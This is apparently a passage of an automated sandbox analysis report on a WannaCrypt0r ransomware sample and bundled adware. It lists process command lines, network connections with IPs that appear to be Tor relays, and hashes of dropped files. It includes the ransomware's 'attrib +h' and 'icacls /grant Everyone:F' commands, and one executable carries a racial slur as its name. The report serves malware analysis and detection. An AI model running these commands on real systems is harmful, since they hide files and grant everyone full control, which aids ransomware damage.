C:\Windows\SysWOW64\regedit.exe
/e "945.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.html"
C:\Windows\SysWOW64\regedit.exe
/e "946.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.DesktopAppInstaller_1.0.42251.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "947.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "948.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "949.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "950.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "951.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "952.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "953.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "954.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsNotepad_10.2102.13.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "955.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "956.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "957.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Windows.Photos_21.21030.25003.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "958.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-200_8wekyb3d8bbwe"
C:\Windows\SysWOW64\regedit.exe
/e "959.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.sharewareonline.com/emailentry.aspx?referrer=SOREF_NOTAVAIL&pid=8D-E9-5A-CB-DC-60-C5-00&INSTALLDATE=08092024
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff90fa83cb8,0x7ff90fa83cc8,0x7ff90fa83cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\db8ebffdf2d4405d9bfca2398fad1b18 /t 9696 /p 9692
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\WannaCrypt0r.zip"
C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe
"C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe"
C:\Users\Admin\Desktop\NIGGARAP.exe
"C:\Users\Admin\Desktop\NIGGARAP.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49791 | tcp | |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:49798 | tcp | |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| NL | 142.250.179.174:443 | redirector.gvt1.com | tcp |
| NL | 142.250.179.174:443 | redirector.gvt1.com | udp |
| DE | 74.125.111.136:443 | r3---sn-4g5edn6k.gvt1.com | tcp |
| DE | 74.125.111.136:443 | r3---sn-4g5edn6k.gvt1.com | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| NL | 142.250.179.196:443 | www.google.com | tcp |
| NL | 142.250.179.196:443 | www.google.com | tcp |
| NL | 142.250.179.196:443 | www.google.com | udp |
| DE | 49.12.202.237:80 | 7zip.org | tcp |
| DE | 49.12.202.237:80 | 7zip.org | tcp |
| DE | 49.12.202.237:443 | 7zip.org | tcp |
| DE | 49.12.202.237:443 | 7zip.org | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| US | 8.8.8.8:53 | 7-zip.org | udp |
| US | 8.8.8.8:53 | 7-zip.org | udp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| US | 8.8.8.8:53 | adserver.sharewareonline.com | udp |
| US | 13.248.169.48:80 | mail.softwareonline.com | tcp |
| NL | 212.32.237.90:80 | adserver.sharewareonline.com | tcp |
| NL | 212.32.237.90:80 | adserver.sharewareonline.com | tcp |
| US | 8.8.8.8:53 | 90.237.32.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.169.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | ts.gator.com | udp |
| US | 8.8.8.8:53 | ts.gator.com | udp |
| US | 8.8.8.8:53 | updateserver.cpurocket.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | store.sharewareonline.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| NL | 212.32.237.90:443 | store.sharewareonline.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 45.62.255.25:443 | tcp | |
| US | 128.31.0.39:9101 | tcp | |
| GB | 178.62.60.37:443 | tcp | |
| FR | 163.172.157.213:443 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| SE | 185.97.32.18:9001 | tcp | |
| NL | 194.109.206.212:443 | tcp | |
| SE | 171.25.193.9:80 | tcp | |
| PL | 45.141.215.85:143 | tcp | |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.215.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ts.gator.com | udp |
| US | 8.8.8.8:53 | ts.gator.com | udp |
| BO | 200.87.164.69:9999 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 172.217.23.206:80 | google.com | tcp |
| BO | 200.87.164.69:9999 | tcp | |
| NL | 172.217.23.206:80 | google.com | tcp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\df7bdd05-11ee-4538-b08d-71fc085dbb55
| MD5 | 4162ae24bb69de2ec10ac82fd9ba4228 |
| SHA1 | 942f3cf94cbcc1f6de961d794dcbe32036287220 |
| SHA256 | 1c9f07694da14620834f3b744f9935d7e1c0ccbef3fdc8ec73ef0b85019221ff |
| SHA512 | 480a32a5210cf43d24b4c4fb8913041c22e1fd94b147c6f3befa6e4534bad6985d7c009908a7fbaae62e5d7ebc73d37d02bbcfa44ba5917ca7885328b2cfba53 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\d0b2fd72-0a02-44ad-ac9f-c829050aa7f1
| MD5 | 47996c35c6569aceb3b26b7a6114f14b |
| SHA1 | 7b2a6a80962c0a6429e8cdf83872e2cab50c85a3 |
| SHA256 | 6e7fec96323fdb16c9ec0a711195a5215732ef10bbff19e6d379b447973c9cbe |
| SHA512 | 07c6f53ff4429c9e79c961ec9a8c644f1c367560bf01936e4b879adcd87d5b44a3c509a4276d7d2a8b5f4ffcad75fd127fd08add0c54ddc5b9d1e02bf0e75c4d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\3896854a-eee8-4695-b429-d069e7a093d2
| MD5 | 625009cc3ec641ae87a4279bb993a6aa |
| SHA1 | 46ffb85be4e6f659f6d3f47ec6c083faabb9a47f |
| SHA256 | 8ebece4da553ea88c8668e165d6754233aa5857c6b086d54b2c8d5b2bd76eec7 |
| SHA512 | 61b5d4244afd253f86c2224edaf1f25a96a617a84c722490d8d7ec619ef8789e0c78717a5ee5f208d269249728a95466bfcb4de97c95727a5ffaccb158313fdf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | d8f12c380404694f3f47b73f13cf63f8 |
| SHA1 | 228a63dbca4ada719f2fc48c74b41936f24dbb10 |
| SHA256 | 7ce8d2037900b6f60b455535d6c9bde2e831f35173412413d93aeb81e10a7abc |
| SHA512 | 0bd5558dc6fdfc9ff9270021871f043783594e43c2e0ed3d9bb21fe4687c8ec9eacaaf4eabd758d6d71a30c2fc2f050d322c55cb029502c09dca97ee3e37a51c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | e49a7a392a62ecc206c52cb70f831cae |
| SHA1 | 93b44988d6414185811fcbad3778d5225f7dcaac |
| SHA256 | 4f6c579b321d75dbfdf7bd04bab5f355a461d55712542e8725fd8f6f8e35bb78 |
| SHA512 | 5046fefe77dacc6ef6ea2f12935f6ee525fffb13a336028c1bedcc28bdf5e7d9d145bb20c200a20c4b919448643acae2ba0056e70cbc792a661378ba6b1cc91b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\activity-stream.discovery_stream.json
| MD5 | 3a2173d0683fe53af7b43a688d418311 |
| SHA1 | 333a2578e174d61b667a74720e5af3e4f691cab6 |
| SHA256 | 67ab5532e7febfd1741247e868ac05525d9dc556f04175432b5ff9ab8d52d4c5 |
| SHA512 | 3aabb2ed8d74aec2ecfdad646d0bd22cb34a51ff57aef08daccbe4e9c3f0818b405c17c133c2be39cc7cc32e7fc3b37ca6fd45349feef8c67e8b040b11acb1f9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs.js
| MD5 | d5ececc2e590a8fb49b7f2eea4a06354 |
| SHA1 | 8c880b2340d2d0181bd5ec2f1e07a5bd9d8f8187 |
| SHA256 | 3896ef1055dd203c8112a4b4daf54dcd04e85cfe3b98b5452d3205a2cfaca456 |
| SHA512 | 81ab5cf84fa4de1280f5b45afbb582ac4dfe2df399c0e5ca4c5b6217dc80871c2092af5ce0c0c6dff310c0a8eeb3f738715046a8ca9b8dcec2063bf9ca84d226 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 488c16fa82a44aa415153a30d084e168 |
| SHA1 | d614c8671c673e22b91b330c4e01fd1f4a6c07f5 |
| SHA256 | 63c40beda6fbe83e93d45f0a0e5453a968fe4aef67cf39123131595a51043b16 |
| SHA512 | b1adaa181ce543686f0f3e56d1926453c5464a9bd8b5ce7d3e4ecf6f3f3d3fa9e805a9f3aa33b91a85c6351cba71a27570bcadeb5770e44e0485f2ae7d9cc26c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs.js
| MD5 | 8c0c8378ea746a526649bf62a1fdf65e |
| SHA1 | afed740c79e70a82f787d89fe7542d49dc3c0125 |
| SHA256 | a3797a505283c475d72722dd5ed867a6e054a72c0c2d8e019d53c556deef25da |
| SHA512 | 1e4c8d0919ed892c380ce582515386238c64101cdeb3bdf1875a9b1616d9718ca4cb7ba62b8208e923f5b473c6d523165333478e5811487777be60f769c69ab7 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\cache2\entries\E449899591A9BC91DFBA673EC0589B51E541A88B
| MD5 | 2f3a62a7969f5a44d0434d6fd7ccd9ff |
| SHA1 | 3c8b3ff37a978e8cdca137cec220bb944a290fde |
| SHA256 | 7d0f9644797e0408ca4c1b1194ecb76aa3dd6754b78bd582e3af605975eeb325 |
| SHA512 | b977294007c7041371297c9089a578fdb196953f15656d8b1d272921059fab993db1c10893a023f63a58b688702f4f7ce0b52b69d924a85b4b784b1eb6103032 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\AlternateServices.bin
| MD5 | 88a7852f574cf417a0d2bd51ac4ed55e |
| SHA1 | 89b597cfc9f080d946f62f09d87e62d43980b7b9 |
| SHA256 | cc7abe03c90ce8d81bd603d7cb5840762ccbb0f4e36fdff76fb284e25177d7c6 |
| SHA512 | 9accad3235a6823f9c36ce2ef70280f31c8d72bfea40e9b8b296279f5c552a5871bc072331426f2de94d2c697d2c04bbe06c551ec66c90a724ff2e52da167935 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js
| MD5 | 867099db4b40db024d68b5e6e054f7d0 |
| SHA1 | d3dc6d8668b997327d81f8b4b78de0b26ee3277e |
| SHA256 | 04e248ab05969137c284d30703bbdc5b58811f50ab3ce020badf8b0e56bbe790 |
| SHA512 | be5325bb4d20b274feca97e6f4a43c4d2c6fc9f3a4c581a1d2f19a52e5602228adf0a18367ca4971237142b32ff5d19dc2c0601f7a12e69cd45b57df54eb4500 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | e8c30909a2950f8d9675fab1ef416f36 |
| SHA1 | dfd7e199011c8fb42ae12a90c781c870a6d09429 |
| SHA256 | 5ef7ad528be06dd8b7ed9effde63e26bd019826edeb585bec7d169570b365927 |
| SHA512 | 7edde3bcde60228fb836103230f57f07c657cedc5d713d45b682864d27846f44e4c73ca64d59b752a8e71279c38ff2d2c1f7ddf0620b9786812c75a7a237f7a3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 4a3b24d6ddbe3d16fb94c0a3ed4f72a4 |
| SHA1 | fc2e82dea27e3a70d69f92f090750e2e1d012604 |
| SHA256 | 34ab9b23cbadf7f68f0433cb5a1aad321de17c895db056d7f1a4427c5974247b |
| SHA512 | 5468c649603d2b2276733f3e5cc87e3154ebb51585f4ad2f2d5bea8a382cbea5010f446343aecc0a902f8547dcbd755e7cf1a2857216aca14dcd59b38a4c7087 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js
| MD5 | 15c3f7143f50de41bda107638aa86946 |
| SHA1 | 06f808bb1f42763ea7d6015b94a81ad70fe74a32 |
| SHA256 | 6f9a6376831ecd851891b1c2b0467b23d35a81b07d9239c52bd5933a93eecabb |
| SHA512 | cbd2be73ea3bb509bb4eda725ab49d09e7f9412afc9af02e6de74fec58a5327422b2b53294fb144fa44b8c4f532da1b1c6ac80cd986f3e935a78ebaf6241e2ad |
C:\Users\Admin\Downloads\AdvancedSystemOptimizer.ufTeMA1_.7z.part
| MD5 | 9c451b819786df8d31eae3387b5e4e3b |
| SHA1 | de2a7741a52e9a3accd29b5c7df1c06fbb0f0ef2 |
| SHA256 | 3c614c930ac65a06fbae126571ea951885450364e2847b3d7964d29233008765 |
| SHA512 | 7632058fd9e99004707979e8a3dd38ca511e67f0d2ab9affd1478ded15103f86cbeac714ce05ab18f30807406ea5b524358792a40a1fd98154ec4f7140ec6b95 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js
| MD5 | 221b9fab19cfbf756b065ed90844b4cc |
| SHA1 | 9691771decc5b7b148b3c53134e8219c1677e33a |
| SHA256 | 02720769e33d8f01e7136caf062b7f5a32341a94a3c08d21a596362a5a0debf8 |
| SHA512 | 8ca3a64a1694a7557bcc48f2c8bd098cdacdcfa4dd1bc1d87968f67e17d11958ceaacc14d0603abbbae75ed0da2416e9f878314b4c205e256e3f80871f58afd3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 6379a2115958d1ee8ab2ff9abd897243 |
| SHA1 | 426c4efbe90fce9d6d685a1b36dc2523021a06cb |
